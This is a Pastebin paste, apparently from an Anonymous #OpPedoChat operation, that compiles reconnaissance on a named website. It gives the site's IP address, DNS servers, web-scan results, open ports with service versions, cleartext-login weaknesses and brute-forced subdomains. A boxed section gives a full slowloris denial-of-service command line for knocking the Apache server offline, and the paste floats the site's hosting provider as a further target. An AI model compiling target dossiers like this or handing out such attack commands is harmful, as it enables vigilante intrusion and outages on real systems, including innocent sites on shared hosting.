Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Twitter -; @WaveAnonops
- #OpPedoChat
- #EXPECT US
- ------------------------------------------------------------------------------
- Charging Lulzcannon.
- Target acquired: http://underlicious.net/
- ------------------------------------------------------------------------------
- DNS Servers for underlicious.net:
- ns1.dreamhost.com
- ns3.dreamhost.com
- ns2.dreamhost.com
- * Dreamhost is hosting a LOT of these websites. Possible target to consider, but without innocent sites getting damaged. I don't know if they mean to host these sites, or if they are just idiots.*
- ---------------------------------------------------------------------------
- + Target IP: 173.236.221.101
- + Target Hostname: underlicious.net
- + Target Port: 80
- + Start Time: 2012-07-13 17:29:06
- ---------------------------------------------------------------------------
- + Server: Apache
- + Retrieved x-powered-by header: W3 Total Cache/0.9.2.4
- + No CGI Directories found (use '-C all' to force check all possible dirs)
- + robots.txt contains 2 entries which should be manually viewed.
- ------------------------------------------------------------------------------------------
- Port 21;
- The remote FTP server allows the user's name and password to be transmitted in clear text, which could be intercepted by a network sniffer or a man-in-the-middle attack.
- -----------------------------------
- Port 25 and 587;
- Synopsis: The remote mail server allows cleartext logins.
- Description : The remote host is running an SMTP server that advertises that it allows cleartext logins over unencrypted connections. An attacker may be able to uncover user names and passwords by sniffing traffic to the server if a less secure authentication mechanism (i.e. LOGIN or PLAIN) is used.
- -------------------------------------------------------------------------------
- Ports:
- Discovered open port 587/tcp on 173.236.221.101
- Discovered open port 22/tcp on 173.236.221.101
- Discovered open port 554/tcp on 173.236.221.101
- Discovered open port 21/tcp on 173.236.221.101
- Discovered open port 80/tcp on 173.236.221.101
- Discovered open port 5222/tcp on 173.236.221.101
- Discovered open port 7070/tcp on 173.236.221.101
- Discovered open port 5269/tcp on 173.236.221.101
- Discovered open port 555/tcp on 173.236.221.101
- Discovered open port 8000/tcp on 173.236.221.101
- Discovered open port 8001/tcp on 173.236.221.101
- rDNS record for 173.236.221.101: apache2-argon.giedi.dreamhost.com
- PORT STATE SERVICE VERSION
- 21/tcp open ftp ProFTPD
- 22/tcp open ssh OpenSSH 5.5p1 Debian 6+squeeze2 (protocol 2.0)
- 25/tcp open smtp Postfix smtpd
- 80/tcp open http Apache httpd
- | robots.txt: has 2 disallowed entries
- |_/wp-admin/ /wp-includes/
- 554/tcp open rtsp Darwin Streaming Server 5.5.5
- 555/tcp open rtsp Darwin Streaming Server 5.5.5
- 587/tcp open smtp Postfix smtpd
- 5222/tcp open jabber Jabber instant messaging server
- 5269/tcp open jabber Jabber instant messaging server
- 7070/tcp open rtsp Darwin Streaming Server 5.5.5
- 8000/tcp open rtsp Darwin Streaming Server 5.5.5
- 8001/tcp open rtsp Darwin Streaming Server 5.5.5
- Service Info: OS: Linux
- ---------------------------------------------------------------------
- #####################################################################
- APACHE DENIAL OF SERVICE: ha.ckers.org/slowloris/slowloris.pl #
- usage: #
- perl slowloris.pl -dns sitename.com -num 10000 -tcpto 5 -timeout 10 #
- ---------------------------------------------------------------------
- Informative DNS bruteforce findings:
- 67.205.5.121 db.underlicious.net
- 173.236.221.101 ftp.underlicious.net
- 67.205.5.121 mysql.underlicious.net
- 173.236.221.101 ssh.underlicious.net
- 173.236.221.101 www.underlicious.net
- 173.236.221.0-255 : 3 hostnames found.
- 67.205.5.0-255 : 2 hostnames found.
- --------------------------------------------------------------------
- #We are Anonymous
- #We are Legion
- #We do not forgive
- #We do not forget
- #Expect us
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement